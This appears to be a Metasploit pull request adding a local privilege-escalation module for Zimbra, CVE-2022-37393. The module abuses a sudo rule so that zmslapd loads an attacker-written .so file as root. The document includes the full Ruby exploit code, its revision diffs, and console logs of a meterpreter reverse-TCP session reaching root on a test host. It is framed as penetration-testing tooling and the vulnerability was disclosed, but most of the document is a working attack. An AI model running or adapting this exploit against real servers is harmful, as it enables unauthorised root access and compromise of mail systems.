### PR TITLE
New module for 0-day Zimbra privilege escalation ("slapper")

### DIFF
--- a/documentation/modules/exploit/windows/local/zimbra_slapper_priv_esc.md
+++ b/documentation/modules/exploit/windows/local/zimbra_slapper_priv_esc.md
@@ -1,0 +1,47 @@
+## Vulnerable Application
+
+Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
+
+## Verification Steps
+
+Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
+
+```
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                  Connection
+  --  ----  ----                   -----------                  ----------
+  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
+
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
+SESSION => 10
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Executing: sudo -n -l
+[+] The target is vulnerable.
+[*] Creating exploit directory: /tmp/.5kq9XO
+[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted /tmp/.5kq9XO
+[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+## Options
+
+### SUDO_PATH
+
+The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
+
+### ZIMBRA_BASE
+
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Privileged' => true,
         'References' => [
-          [ 'CVE', '2022-37393',
+          [ 'CVE', '2022-37393' ],
           [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
         ],
         'Targets' => [

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Local
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Privileged' => true,
         'References' => [
-          # [ 'CVE', '2022-?????' ], # TODO Currently no CVE, but I reported it and requested one
+          # Currently there is no CVE, but I reported it and requested one
           [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
         ],
         'Targets' => [

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zimbra zmslapd arbitrary module load',
+        'Description' => %q{
+          This module exploits a vulnerability in Zimbra's sudo configuration,
+          which permits the zimbra user to execute zmslapd with arbitrary
+          parameters. That service can load an arbitrary .so file, which allows
+          us to escalate to root.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Darren Martyn', # discovery and poc
+          'Ron Bowes',     # Module
+        ],
+        'DisclosureDate' => '2021-10-27',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Privileged' => true,
+        'References' => [
+          # [ 'CVE', '2022-0995' ], # TODO Currently no CVE, but I reported it and requested one
+          [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
+        ],
+        'Targets' => [
+          [ 'Auto', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options [
+      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),
+      OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  # Because this isn't patched, I can't say with 100% certainty that this will
+  # detect a future patch (it depends on how they patch it)
+  def check
+    # Sanity check
+    if is_root?
+      fail_with(Failure::None, 'Session already has root privileges')
+    end
+
+    unless file_exist?("#{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
+      print_error("zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")
+      return CheckCode::Safe
+    end
+
+    unless command_exists?(datastore['SUDO_PATH'])
+      print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")
+      return CheckCode::Safe
+    end
+
+    # Run `sudo -n -l` to make sure we have access to the target command
+    cmd = "#{datastore['SUDO_PATH']} -n -l"
+    print_status "Executing: #{cmd}"
+    output = cmd_exec(cmd).to_s
+
+    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
+      print_error("Current user could not execute sudo -l")
+      return CheckCode::Safe
+    end
+
+    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
+      print_error('Current user does not have access to run zmslapd')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    base_dir = datastore['WritableDir'].to_s
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    # Generate a random directory
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    if file_exist?(exploit_dir)
+      fail_with(Failure::BadConfig, 'Exploit dir already exists')
+    end
+
+    # Create the directory and get ready to remove it
+    print_status("Creating exploit directory: #{exploit_dir}")
+    mkdir(exploit_dir)
+    register_dir_for_cleanup(exploit_dir)
+
+    # Generate some filenames
+    library_name = ".#{rand_text_alphanumeric(5..10)}.so"
+    library_path = "#{exploit_dir}/#{library_name}"
+    config_name = ".#{rand_text_alphanumeric(5..10)}"
+    config_path = "#{exploit_dir}/#{config_name}"
+
+    # Create the .conf file
+    config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n"
+
+    write_file(library_path, generate_payload_dll)
+    write_file(config_path, config)
+
+    cmd = "#{datastore['sudo_path']} -n -l"
+    cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
+    print_status "Attempting to trigger payload: #{cmd}"
+    cmd_exec(cmd).to_s
+  end
+end

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
     output = cmd_exec(cmd).to_s
 
     if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
-      print_error("Current user could not execute sudo -l")
+      print_error('Current user could not execute sudo -l')
       return CheckCode::Safe
     end
 
@@ -125,7 +125,6 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(library_path, generate_payload_dll)
     write_file(config_path, config)
 
-    cmd = "#{datastore['sudo_path']} -n -l"
     cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
     print_status "Attempting to trigger payload: #{cmd}"
     cmd_exec(cmd).to_s

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
           This module exploits a vulnerability in Zimbra's sudo configuration,
           which permits the zimbra user to execute zmslapd with arbitrary
           parameters. That service can load an arbitrary .so file, which allows
-          us to escalate to root.
+          us to run code as root.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -33,11 +33,11 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DisclosureDate' => '2021-10-27',
         'Platform' => [ 'linux' ],
-        'Arch' => [ ARCH_X64 ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Privileged' => true,
         'References' => [
-          # [ 'CVE', '2022-0995' ], # TODO Currently no CVE, but I reported it and requested one
+          # [ 'CVE', '2022-?????' ], # TODO Currently no CVE, but I reported it and requested one
           [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
         ],
         'Targets' => [

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -21,10 +21,12 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Zimbra zmslapd arbitrary module load',
         'Description' => %q{
-          This module exploits a vulnerability in Zimbra's sudo configuration,
-          which permits the zimbra user to execute zmslapd with arbitrary
-          parameters. That service can load an arbitrary .so file, which allows
-          us to run code as root.
+          This module exploits CVE-2022-37393, which is a vulnerability in
+          Zimbra's sudo configuration that permits the zimbra user to execute
+          the zmslapd binary as root with arbitrary parameters. As part of its
+          intended functionality, zmslapd can load a user-defined configuration
+          file, which includes plugins in the form of .so files, which also
+          execute as root.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -37,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Privileged' => true,
         'References' => [
-          # Currently there is no CVE, but I reported it and requested one
+          [ 'CVE', '2022-37393',
           [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
         ],
         'Targets' => [

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -121,12 +121,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Create the .conf file
     config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n"
+    write_file(config_path, config)
 
     write_file(library_path, generate_payload_dll)
-    write_file(config_path, config)
 
     cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
     print_status "Attempting to trigger payload: #{cmd}"
-    cmd_exec(cmd).to_s
+    cmd_exec(cmd)
   end
 end

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    CheckCode::Vulnerable
+    CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
           'Stability' => [ CRASH_SAFE ],
-          'SideEffects' => []
+          'SideEffects' => [ IOC_IN_LOGS ]
         }
       )
     )

--- a/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
+++ b/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb
@@ -129,6 +129,10 @@ class MetasploitModule < Msf::Exploit::Local
 
     cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
     print_status "Attempting to trigger payload: #{cmd}"
-    cmd_exec(cmd)
+    out = cmd_exec(cmd)
+
+    unless session_created?
+      print_error("Failed to create session! Cmd output = #{out}")
+    end
   end
 end


### PR DESCRIPTION
This adds a local exploit for Zimbra, to go from the `zimbra` user to `root` by using a sudo-able executable that can load an arbitrary .so file. This was [publicly disclosed in October of 2021](https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/), but I'm not sure that anybody reported it to Zimbra. (I reported it today, have not heard back yet)

Note that this is branched off of https://github.com/rapid7/metasploit-framework/pull/16796 since it goes with that module (and is what I'm using for testing) - I'm happy to re-base if that's a problem!

## Verification

Install Zimbra (sorry) on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...

```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root
```